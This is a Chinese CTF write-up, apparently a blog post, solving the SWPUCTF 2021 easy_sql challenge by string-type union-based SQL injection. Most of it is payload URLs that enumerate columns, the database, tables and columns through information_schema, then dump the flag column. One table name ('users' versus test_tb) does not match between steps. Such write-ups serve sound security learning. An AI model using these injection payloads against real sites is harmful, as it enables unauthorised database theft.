字符型注入([SWPUCTF 2021 新生赛]easy_sql)

拿到题目,查看源码,可知是要输入参数wllm。

输入参数/?wllm=1,得到会显

继续输入参数/?wllm=1',报错,确定为字符型漏洞

1.查看字段列表,发现在字段4报错,确定为3列

复制代码
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

2.查看回显

复制代码
?wllm=-1' union select 1,2,3--+

3.查询数据库名(test_db)

复制代码
?wllm=-1' union select 1,2,database()--+

4.查看test_db库的表(users)

复制代码
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

5.查询字段

复制代码
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

6.出现flag字段,查看flag字段的内容

复制代码
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

出现flag字段,成功解出

相关推荐
刘~浪地球5 分钟前
Nginx + Tomcat 整合实战(六):安全加固与生产部署
nginx·安全·tomcat
hutengyi9 分钟前
保姆级JavaWeb项目创建、部署、连接数据库(tomcat)
数据库·tomcat·firefox
苏渡苇10 分钟前
ConcurrentHashMap.computeIfAbsent():高并发下安全初始化的终极方案
java·安全·jdk·高并发·hashmap·concurrent
紫雾凌寒10 分钟前
Claude Code 自动模式:一种更安全的跳过权限审批的方式【译】
安全·ai·ai编程·claude·claudecode
123过去11 分钟前
ophcrack-cli使用教程
linux·网络·测试工具·安全
Biomamba生信基地11 分钟前
OpenClaw可能遇到的安全风险
安全·生物信息学·openclaw
金士镧(厦门)新材料有限公司14 分钟前
PVC抑烟剂:让卷材更安全的隐形守护者
科技·安全·全文检索·生活·能源
骥龙14 分钟前
第七篇:频道接入安全——严防未授权对话
人工智能·安全
寰宇的行者15 分钟前
深入理解 Django 异步视图中的 `sync_to_async` 与协程
数据库·django
草莓熊Lotso17 分钟前
MySQL 索引特性与性能优化全解
android·运维·数据库·c++·mysql·性能优化